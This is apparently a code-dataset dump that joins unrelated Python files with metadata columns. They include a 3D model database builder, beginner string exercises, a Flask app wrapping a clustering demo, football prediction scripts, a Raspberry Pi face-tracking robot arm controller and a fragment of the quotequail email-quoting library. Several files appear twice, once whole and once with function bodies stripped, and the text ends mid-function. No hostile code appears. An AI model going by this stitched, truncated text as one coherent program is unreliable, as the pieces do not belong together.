MAX_SURFACE_LOW_SIZE = 5 * 1024 * 1024
| 36.494737 | 160 | 0.590424 | import os
import json
import shutil
from peewee import SqliteDatabase
from wearebeautiful.db_model import DBModel, db, create_from_manifest
from wearebeautiful.manifest import validate_manifest
import config
DB_FILE = "wab-models.db"
MIN_SURFACE_MED_SIZE = 8 * 1024 * 1024
MAX_SURFACE_MED_SIZE = 12 * 1024 * 1024
MIN_SURFACE_LOW_SIZE = 1.5 * 1024 * 1024
MAX_SURFACE_LOW_SIZE = 5 * 1024 * 1024
def add_models(dir):
for item in os.listdir(dir):
if item.endswith(".json"):
with(open(os.path.join(dir, item), "rb")) as m:
try:
manifest = json.loads(str(m.read().decode('utf-8')))
except json.decoder.JSONDecodeError as err:
print(" skipping %s: %s" % (item, str(err)))
continue
except IOError as err:
print(" skipping %s: %s" % (item, str(err)))
continue
err = validate_manifest(manifest)
if err:
print(" manifest not valid, skipping: %s" % err)
continue
model = create_from_manifest(manifest)
print(" add %s-%s-%d " % (model.model_id, model.code, model.version), end = '')
model.save()
surface_med = os.path.join(config.MODEL_DIR, model.model_id, model.code, "%s-%s-%d-surface-med.stl" % (model.model_id, model.code, model.version))
surface_med_size = os.path.getsize(surface_med)
if surface_med_size > MAX_SURFACE_MED_SIZE:
med_size_warn = '+'
elif surface_med_size < MIN_SURFACE_MED_SIZE:
med_size_warn = '-'
else:
med_size_warn = ' '
surface_low = os.path.join(config.MODEL_DIR, model.model_id, model.code, "%s-%s-%d-surface-low.stl" % (model.model_id, model.code, model.version))
surface_low_size = os.path.getsize(surface_low)
if surface_low_size > MAX_SURFACE_LOW_SIZE:
low_size_warn = '+'
elif surface_low_size < MIN_SURFACE_LOW_SIZE:
low_size_warn = '-'
else:
low_size_warn = ' '
print(" med: %5.2f MB %s " % (surface_med_size / 1024.0 / 1024.0, med_size_warn), end = '')
print(" low: %5.2f MB %s " % (surface_low_size / 1024.0 / 1024.0, low_size_warn), end = '')
screenshot = os.path.join(config.MODEL_GIT_DIR, model.model_id, model.code, "%s-%s-%d-screenshot.jpg" % (model.model_id, model.code, model.version))
if not os.path.exists(screenshot):
print(" (warning: %s is missing)" % screenshot)
else:
print()
def add_human_model(dir):
for item in os.listdir(dir):
dir_name = os.path.join(dir, item)
if len(item) == 4 and not item.isdigit():
add_models(dir_name)
def create_database():
db_file = os.path.join(config.MODEL_GIT_DIR, DB_FILE)
print("creating db file '%s'" % db_file)
try:
os.unlink(db_file)
except OSError:
pass
db.init(db_file)
db.create_tables([DBModel])
for item in os.listdir(config.MODEL_DIR):
dir_name = os.path.join(config.MODEL_DIR, item)
if len(item) == 6 and item.isdigit() and os.path.isdir(dir_name):
add_human_model(dir_name)
db_file_non_git = os.path.join(config.MODEL_DIR, DB_FILE)
shutil.copyfile(db_file, db_file_non_git)
| 2,997 | 0 | 69 |
d87d8fc47074e1ce777b15fdf6a6fb91c0181af1 | 733 | py | Python | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null |
# print(pig_latin("Python"))
# print(pig_latin("computer"))
# print(pig_latin(("air")))
# print(ubbi_dubbi())
get_running_avg()
| 18.794872 | 42 | 0.572988 | def pig_latin(word):
vowels = "aeiou"
if not word:
return None
if word[0] in vowels:
return word+"way"
else:
new_word = [word[1:]+word[0]+"ay"]
return "".join(new_word)
# print(pig_latin("Python"))
# print(pig_latin("computer"))
# print(pig_latin(("air")))
def ubbi_dubbi():
word = input("please enter a word: ")
vowels = "aeiou"
result = []
for c in word:
if c in vowels:
result.append("ub")
result.append(c)
return "".join(result)
# print(ubbi_dubbi())
def get_running_avg():
numbers = input("enter the numbers: ")
numbers = numbers.split(" ")
array = [int(n) for n in numbers]
print(array)
get_running_avg()
| 529 | 0 | 68 |
d4423723c5ded922dbd098a0b6a015236bed2606 | 2,490 | py | Python | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask(__name__)
@app.route('/')
if __name__ == '__main__':
app.run()
| 31.923077 | 76 | 0.542972 | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
# ----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
# ----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
return 'Hello World!'
if __name__ == '__main__':
app.run()
| 2,360 | 0 | 22 |
23a910acf49e30a5a8a9310c45d430a0c2df692a | 130 | py | Python | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | from django.contrib import admin
# Register your models here.
from accounts.models import Customer
admin.site.register(Customer) | 21.666667 | 36 | 0.823077 | from django.contrib import admin
# Register your models here.
from accounts.models import Customer
admin.site.register(Customer) | 0 | 0 | 0 |
aeb22914ed6e50a3574958d1d84e46aeb1996420 | 3,596 | py | Python | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null |
'''
def compare(file1, file2):
f1 = open(file1, 'r')
f2 = open(file2, 'r')
right_counter = 0
wrong_lines = []
for i in range(50):
r1 = f1.readline()
r2 = f2.readline()
r1 = r1.strip('\n')
r2 = r2.strip('\n')
if r1[-1:] == r2[-1:]:
right_counter += 1
else:
wrong_lines.append(i)
print('Wrong lines are: %s\nAmount of wrongs is %i\n\nAmount of rights is %i\nWell Done!' % (str(wrong_lines), len(wrong_lines), right_counter))'''
compare('actual_brazil_2014.csv', 'predicted_brazil_5')
| 21.793939 | 148 | 0.630423 |
def get_team_names(deatils):
outfile = open('team_names.txt', 'a+')
teams = []
for game in details:
for i in ['home-team', 'away-team']:
if game[i] not in teams:
teams.append(game[i])
outfile.write('\n'.join(teams))
outfile.close()
def sort_team_names():
file = open('team_names.txt', 'r')
teams = file.read()
teams = teams.split('\n')
file.close()
file = open('team_names.txt', 'w')
for t in sorted(teams):
file.write(t + '\n')
file.close()
def parse_fixtures():
file = open('fixtures_russia_2018.csv', 'r')
details = []
file.readline()
for game in file:
game = game.strip('\n')
stuff = game.split(',')
info = {
'game': stuff[1],
'date-time': stuff[2],
'stage': stuff[3],
'home-team': stuff[6],
'away-team': stuff[7]
}
details.append(info)
file.close()
return details
def organize_matches():
file = open('data/results.csv', 'r')
r = file.readline()
r = r.strip('\n')
r = r.split(',')
matches = []
for stat in file:
stat = stat.strip('\n')
infos = stat.split(',')
if infos[0] < "1985-01-01": continue
k = {}
for i, j in enumerate(r):
k[j] = infos[i]
matches.append(k)
from parsers.utils import write_json
write_json('data/matches', matches)
def get_wc_matches():
from parsers import utils
matches = utils.read_json('data/matches')
wc_matches = []
for match in matches:
year = match['date'].split('-')[0]
if year not in [str(x) for x in range(1990, 2019, 4)]: continue
if match['tournament'] != 'FIFA World Cup': continue
match_info = {
'year': year,
'home_score': match['home_score'],
'away_score': match['away_score'],
'home_team': match['home_team'],
'away-team': match['away_team'],
'date': match['date'],
'country': match['country']
}
wc_matches.append(match_info)
utils.write_json('data/wc_matches', wc_matches)
def get_alternate_names():
alternate_names = {}
while True:
former = input('Enter former name here: \n-> ')
if former == 'no': break
while True:
latter = input('Enter a latter name here: \n-> ')
if latter == 'no': break
alternate_names[latter] = former
from parsers.utils import write_json
write_json('data/alternate_names', alternate_names)
'''
def compare(file1, file2):
f1 = open(file1, 'r')
f2 = open(file2, 'r')
right_counter = 0
wrong_lines = []
for i in range(50):
r1 = f1.readline()
r2 = f2.readline()
r1 = r1.strip('\n')
r2 = r2.strip('\n')
if r1[-1:] == r2[-1:]:
right_counter += 1
else:
wrong_lines.append(i)
print('Wrong lines are: %s\nAmount of wrongs is %i\n\nAmount of rights is %i\nWell Done!' % (str(wrong_lines), len(wrong_lines), right_counter))'''
def compare(f1, f2):
file1 = open(f1, 'r')
file2 = open(f2, 'r')
file1.readline()
file2.readline()
right_results = 0
right_scores = 0
incorrect_teams = 0
while True:
r1 = file1.readline()
r1 = r1.strip('\n')
r2 = file2.readline()
r2 = r2.strip('\n')
if not r1 or not r2:
break
r1 = r1.split(',')
r2 = r2.split(',')
print(r1)
print(r2)
if r1[2] != r2[2] or r1[3] != r2[3]:
incorrect_teams += 1
continue
if r1[4] == r2[4] and r1[5] == r2[5]:
right_scores += 1
if r1[6] == r2[6]:
right_results += 1
print ('Number of incorrect team predictions is %i\n\nNumber of right results is %i\n\nNumber of right scores is %i'
% (incorrect_teams, right_results, right_scores))
def cmp_line(file1, file2):
f1 = open(file1, 'r')
f2 = open(file2, 'r')
while True:
i = input()
print(f1.readline(), end="")
print(f2.readline(), end="")
compare('actual_brazil_2014.csv', 'predicted_brazil_5')
| 2,902 | 0 | 184 |
5ccdda389df3723602d93a8ee43208eb6dde9c1e | 125 | py | Python | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | null | null | null | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 55 | 2017-12-21T15:20:36.000Z | 2019-01-20T02:49:41.000Z | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 3 | 2018-05-18T09:02:36.000Z | 2019-12-29T10:27:44.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from db import SessionFactory, Engine
__all__ = [
SessionFactory,
Engine
]
| 12.5 | 37 | 0.672 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from db import SessionFactory, Engine
__all__ = [
SessionFactory,
Engine
]
| 0 | 0 | 0 |
15464d100b378bacafa095cea5a8e320fa5b16fc | 2,596 | py | Python | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | 2 | 2019-09-19T13:22:48.000Z | 2020-01-13T17:03:46.000Z | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | null | null | null | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Глобальный файл настроек
"""
# ######################################################################################################################
# Класс для выделения текста
# ######################################################################################################################
class Color:
"""Класс для выделения текста"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------
# Свойства
# ------------------------------------------------------------------------------------------------------------------
@property
@property
@property
@property
@property
# ######################################################################################################################
# Класс для сообщений
# ######################################################################################################################
class Messages(Color):
"""Класс для сообщений"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
| 34.613333 | 120 | 0.277735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Глобальный файл настроек
"""
# ######################################################################################################################
# Класс для выделения текста
# ######################################################################################################################
class Color:
"""Класс для выделения текста"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
def __init__(self):
self._green = '\033[92m' # Зеленый
self._red = '\033[91m' # Красный
self._blue = '\033[94m' # Синий
self._bold = '\033[1m' # Жирный
self._end = '\033[0m' # Выход
# ------------------------------------------------------------------------------------------------------------------
# Свойства
# ------------------------------------------------------------------------------------------------------------------
@property
def green(self):
return self._green
@property
def red(self):
return self._red
@property
def blue(self):
return self._blue
@property
def bold(self):
return self._bold
@property
def end(self):
return self._end
# ######################################################################################################################
# Класс для сообщений
# ######################################################################################################################
class Messages(Color):
"""Класс для сообщений"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
def __init__(self):
super().__init__() # Выполнение конструктора из суперкласса
self._metadata = '[{}] Запуск:' \
'\n\tАвтор: {}\n\t' \
'Email: {}\n\t' \
'Сопровождающие: {}\n\t' \
'Версия: {}'
self._format_time = '%Y-%m-%d %H:%M:%S' # Формат времени
self._invalid_arguments = '[{}{}{}] Неверные типы аргументов в "{}" ...'
self._invalid_file = '[{}{}{}] Необходимые значения в файле не найдены ...'
| 1,001 | 0 | 184 |
4ea1a7e3af7017746226259f4bbb840efd076b0c | 5,261 | py | Python | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | 2 | 2021-11-01T11:02:44.000Z | 2021-12-01T05:40:24.000Z | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | 1 | 2021-12-01T05:33:16.000Z | 2021-12-01T05:33:16.000Z | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | null | null | null | import cv2
import imutils
import time
import threading
import serial
import RPi.GPIO as GPIO
from bluetooth import *
from serial.serialutil import SerialException
# -------------------변수 선언 부분-------------------
port = "/dev/ttyACM0"
reset_timer_seconds = -1
angles = [150, 120, 130]
arduino = serial.Serial(port, 115200, timeout=1)
haarcascade_file = '/home/pi/ArduinoRobotArm_MDP/RaspberryPi/haarcascade/haarcascade_frontalface_alt2.xml'
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.OUT)
server_socket = BluetoothSocket(RFCOMM)
# -------------------타이머 쓰레드 부분-------------------
# -------------------블루투스 함수 부분-------------------
# -------------------모터 제어 함수 부분-------------------
"""
멀티스레드로 send_serial과 read_serial를 상주시켜서 계속해서 시리얼을 주고 받음.
"""
# -------------------OpenCV 함수 부분-------------------
faceCascade = cv2.CascadeClassifier(haarcascade_file) # 얼굴 학습 파일 불러오기
# eyeCascade = cv2.CascadeClassifier('./haarcascade/haarcascade_eye.xml')
video_capture = cv2.VideoCapture(0)
prevTime = 0
# -------------------초기화 부분-------------------
read_thread = threading.Thread(target=read_serial, args=(arduino,))
read_thread.start()
send_thread = threading.Thread(target=send_serial, args=(arduino,))
send_thread.start()
timer_thread = threading.Thread(target=reset_timer)
timer_thread.start()
bluetooth_thread = threading.Thread(target=get_bluetooth)
bluetooth_thread.start()
# -------------------반복문 부분-------------------
while True:
_, frame = video_capture.read()
curTime = time.time()
sec = curTime - prevTime
prevTime = curTime
fps = 1 / sec
fps = "FPS : %0.1f" % fps
frame = imutils.resize(cv2.flip(frame, 1), width=320, height=240) # 라즈베리파이 연산력 부족으로 해상도 리사이즈
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.rectangle(frame, (110, 120), (210, 60), (0, 0, 255), 2)
cv2.putText(canvas, fps, (0, 13),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0))
cv2.imshow('canvas', canvas)
if cv2.waitKey(30) == 27: # esc 눌렀을때 종료
break
video_capture.release()
cv2.destroyAllWindows()
| 31.315476 | 110 | 0.547234 | import cv2
import imutils
import time
import threading
import serial
import RPi.GPIO as GPIO
from bluetooth import *
from serial.serialutil import SerialException
# -------------------변수 선언 부분-------------------
port = "/dev/ttyACM0"
reset_timer_seconds = -1
angles = [150, 120, 130]
arduino = serial.Serial(port, 115200, timeout=1)
haarcascade_file = '/home/pi/ArduinoRobotArm_MDP/RaspberryPi/haarcascade/haarcascade_frontalface_alt2.xml'
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.OUT)
server_socket = BluetoothSocket(RFCOMM)
# -------------------타이머 쓰레드 부분-------------------
def reset_timer():
global reset_timer_seconds, angles
while True:
if reset_timer_seconds > 0:
reset_timer_seconds -= 1
time.sleep(1)
if reset_timer_seconds == 0:
angles = [150, 120, 130]
print("자리 초기화")
reset_timer_seconds = -1
# -------------------블루투스 함수 부분-------------------
def get_bluetooth():
global angles, reset_timer_seconds
server_socket.bind(("", 1))
server_socket.listen(1)
client_socket, address = server_socket.accept()
print("Accepted connection from ", address)
client_socket.send("bluetooth connected!")
while True:
data = client_socket.recv(1024).decode('utf-8')
print(data)
X, Y, Z = data.split(",")
print(f"X: {X}, Y: {Y}, Z: {Z}")
angles = list(map(int, [X, Y, Z]))
reset_timer_seconds = -1
# -------------------모터 제어 함수 부분-------------------
"""
멀티스레드로 send_serial과 read_serial를 상주시켜서 계속해서 시리얼을 주고 받음.
"""
def send_serial(arduino):
global angles
while True:
c = str(int(angles[0])) + "," + str(int(angles[1])) + "," + str(int(angles[2])) # "각도1,각도2,각도3" 꼴로 전송
c = c.encode('utf-8')
try:
arduino.write(c)
time.sleep(0.25) # 시리얼 앞 메시지와 최소 간격 : 0.25초
except SerialException:
print("예외 발생")
def read_serial(arduino):
while True:
if arduino.readable():
val = arduino.readline()
val = val.decode()[:len(val) - 1]
if val != '':
pass
# print(val)
# -------------------OpenCV 함수 부분-------------------
faceCascade = cv2.CascadeClassifier(haarcascade_file) # 얼굴 학습 파일 불러오기
# eyeCascade = cv2.CascadeClassifier('./haarcascade/haarcascade_eye.xml')
def detect(gray, frame):
global reset_timer_seconds
faces = faceCascade.detectMultiScale(gray, scaleFactor=1.03, minNeighbors=5, minSize=(
100, 100), flags=cv2.CASCADE_SCALE_IMAGE)
face_count = len(faces)
if face_count == 0:
GPIO.output(2, True) # LED 빨간색 점등, 초록색 소등
GPIO.output(3, False)
elif face_count == 1:
GPIO.output(2, False) # LED 빨간색 소등, 초록색 점등
GPIO.output(3, True)
for (x, y, w, h) in faces:
reset_timer_seconds = 10
center_x = int(x + w / 2) # 얼굴 중앙 계산
center_y = int(y + h / 2)
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) # 얼굴 시각화
cv2.line(frame, (center_x, center_y), (center_x, center_y), (0, 255, 0), 5) # 얼굴 중앙 시각화
# face_gray = gray[y:y + h, x:x + w]
# face_color = frame[y:y + h, x:x + w]
if center_x < 110:
print("왼쪽으로 치우침")
if angles[0] > 10:
angles[0] -= 0.5
elif center_x > 210:
print("오른쪽으로 치우침")
if angles[0] < 170:
angles[0] += 0.5
if center_y < 60:
print("위로 치우침")
if angles[1] < 170:
angles[1] += 0.5
if angles[2] < 170:
angles[2] += 0.5
elif center_y > 120:
print("아래로 치우침")
if angles[1] > 10:
angles[1] -= 1
if angles[2] > 10:
angles[2] -= 0.5
else:
GPIO.output(2, True) # LED 빨간색 점등, 초록색 소등
GPIO.output(3, False)
print(f'{face_count}개의 얼굴이 감지됨')
return frame
video_capture = cv2.VideoCapture(0)
prevTime = 0
# -------------------초기화 부분-------------------
read_thread = threading.Thread(target=read_serial, args=(arduino,))
read_thread.start()
send_thread = threading.Thread(target=send_serial, args=(arduino,))
send_thread.start()
timer_thread = threading.Thread(target=reset_timer)
timer_thread.start()
bluetooth_thread = threading.Thread(target=get_bluetooth)
bluetooth_thread.start()
# -------------------반복문 부분-------------------
while True:
_, frame = video_capture.read()
curTime = time.time()
sec = curTime - prevTime
prevTime = curTime
fps = 1 / sec
fps = "FPS : %0.1f" % fps
frame = imutils.resize(cv2.flip(frame, 1), width=320, height=240) # 라즈베리파이 연산력 부족으로 해상도 리사이즈
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.rectangle(frame, (110, 120), (210, 60), (0, 0, 255), 2)
cv2.putText(canvas, fps, (0, 13),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0))
cv2.imshow('canvas', canvas)
if cv2.waitKey(30) == 27: # esc 눌렀을때 종료
break
video_capture.release()
cv2.destroyAllWindows()
| 3,258 | 0 | 113 |
d11b9271af6be6db5151310a6e7b78b927945e06 | 556 | py | Python | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 2,692 | 2020-09-15T17:54:21.000Z | 2022-03-31T11:58:57.000Z | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 980 | 2020-09-18T18:23:01.000Z | 2022-03-30T22:20:43.000Z | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 177 | 2020-09-16T00:10:56.000Z | 2022-03-30T21:18:10.000Z | #!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import unittest
from onefuzztypes.validators import check_alnum_dash
if __name__ == "__main__":
unittest.main()
| 23.166667 | 76 | 0.638489 | #!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import unittest
from onefuzztypes.validators import check_alnum_dash
class TestFilter(unittest.TestCase):
def test_filter(self) -> None:
check_alnum_dash("abc-")
check_alnum_dash("-abc12A")
invalid = [".", "abc'", "abc;", "abc\r", "abc\n", "abc;", "abc\x00"]
for value in invalid:
with self.assertRaises(ValueError):
check_alnum_dash(value)
if __name__ == "__main__":
unittest.main()
| 274 | 15 | 49 |
df80bfdf494e35c26f3d249e25ba71884bd5df77 | 5,554 | py | Python | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 35 | 2015-07-21T03:37:37.000Z | 2022-03-14T13:22:40.000Z | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 18 | 2015-11-19T00:52:17.000Z | 2022-02-02T08:03:26.000Z | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 24 | 2016-01-27T10:16:00.000Z | 2022-02-26T23:44:29.000Z | # -*- coding: utf-8 -*-
# quotequail
# a library that identifies quoted text in email messages
import re
from . import _internal
__all__ = ['quote', 'quote_html', 'unwrap', 'unwrap_html']
def quote(text, limit=1000):
"""
Takes a plain text message as an argument, returns a list of tuples. The
first argument of the tuple denotes whether the text should be expanded by
default. The second argument is the unmodified corresponding text.
Example: [(True, 'expanded text'), (False, '> Some quoted text')]
Unless the limit param is set to None, the text will automatically be quoted
starting at the line where the limit is reached.
"""
lines = text.split('\n')
found = _internal.find_quote_position(lines, _patterns.MAX_WRAP_LINES, limit)
if found != None:
return [(True, '\n'.join(lines[:found+1])), (False, '\n'.join(lines[found+1:]))]
return [(True, text)]
def quote_html(html, limit=1000):
"""
Like quote(), but takes an HTML message as an argument. The limit param
represents the maximum number of lines to traverse until quoting the rest
of the markup. Lines are separated by block elements or <br>.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree, limit+1)
found = _internal.find_quote_position(lines, 1, limit)
if found == None:
# No quoting found and we're below limit. We're done.
return [(True, _html.render_html_tree(tree))]
else:
start_tree = _html.slice_tree(tree, start_refs, end_refs,
(0, found+1), html_copy=html)
end_tree = _html.slice_tree(tree, start_refs, end_refs,
(found+1, None))
return [
(True, _html.render_html_tree(start_tree)),
(False, _html.render_html_tree(end_tree)),
]
def unwrap(text):
"""
If the passed text is the text body of a forwarded message, a reply, or
contains quoted text, a dictionary with the following keys is returned:
- type: "reply", "forward" or "quote"
- text_top: Text at the top of the passed message (if found)
- text_bottom: Text at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- text: Unindented text of the wrapped message (if found)
Otherwise, this function returns None.
"""
lines = text.split('\n')
result = _internal.unwrap(lines, _patterns.MAX_WRAP_LINES,
_patterns.MIN_HEADER_LINES,_patterns.MIN_QUOTED_LINES)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
text_top = lines[slice(*top_range)] if top_range else ''
text = lines[slice(*main_range)] if main_range else ''
text_bottom = lines[slice(*bottom_range)] if bottom_range else ''
if needs_unindent:
text = _internal.unindent_lines(text)
result = {
'type': typ,
}
text = '\n'.join(text).strip()
text_top = '\n'.join(text_top).strip()
text_bottom = '\n'.join(text_bottom).strip()
if text:
result['text'] = text
if text_top:
result['text_top'] = text_top
if text_bottom:
result['text_bottom'] = text_bottom
if hdrs:
result.update(hdrs)
return result
def unwrap_html(html):
"""
If the passed HTML is the HTML body of a forwarded message, a dictionary
with the following keys is returned:
- type: "reply", "forward" or "quote"
- html_top: HTML at the top of the passed message (if found)
- html_bottom: HTML at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- html: HTML of the forwarded message (if found)
Otherwise, this function returns None.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree)
result = _internal.unwrap(lines, 1, _patterns.MIN_HEADER_LINES, 1)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
result = {
'type': typ,
}
top_range = _html.trim_slice(lines, top_range)
main_range = _html.trim_slice(lines, main_range)
bottom_range = _html.trim_slice(lines, bottom_range)
if top_range:
top_tree = _html.slice_tree(tree, start_refs, end_refs, top_range,
html_copy=html)
html_top = _html.render_html_tree(top_tree)
if html_top:
result['html_top'] = html_top
if bottom_range:
bottom_tree = _html.slice_tree(tree, start_refs, end_refs,
bottom_range, html_copy=html)
html_bottom = _html.render_html_tree(bottom_tree)
if html_bottom:
result['html_bottom'] = html_bottom
if main_range:
main_tree = _html.slice_tree(tree, start_refs, end_refs, main_range)
if needs_unindent:
_html.unindent_tree(main_tree)
html = _html.render_html_tree(main_tree)
if html:
result['html'] = html
if hdrs:
result.update(hdrs)
return result
| 32.863905 | 88 | 0.620994 | # -*- coding: utf-8 -*-
# quotequail
# a library that identifies quoted text in email messages
import re
from . import _internal
__all__ = ['quote', 'quote_html', 'unwrap', 'unwrap_html']
def quote(text, limit=1000):
"""
Takes a plain text message as an argument, returns a list of tuples. The
first argument of the tuple denotes whether the text should be expanded by
default. The second argument is the unmodified corresponding text.
Example: [(True, 'expanded text'), (False, '> Some quoted text')]
Unless the limit param is set to None, the text will automatically be quoted
starting at the line where the limit is reached.
"""
lines = text.split('\n')
found = _internal.find_quote_position(lines, _patterns.MAX_WRAP_LINES, limit)
if found != None:
return [(True, '\n'.join(lines[:found+1])), (False, '\n'.join(lines[found+1:]))]
return [(True, text)]
def quote_html(html, limit=1000):
"""
Like quote(), but takes an HTML message as an argument. The limit param
represents the maximum number of lines to traverse until quoting the rest
of the markup. Lines are separated by block elements or <br>.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree, limit+1)
found = _internal.find_quote_position(lines, 1, limit)
if found == None:
# No quoting found and we're below limit. We're done.
return [(True, _html.render_html_tree(tree))]
else:
start_tree = _html.slice_tree(tree, start_refs, end_refs,
(0, found+1), html_copy=html)
end_tree = _html.slice_tree(tree, start_refs, end_refs,
(found+1, None))
return [
(True, _html.render_html_tree(start_tree)),
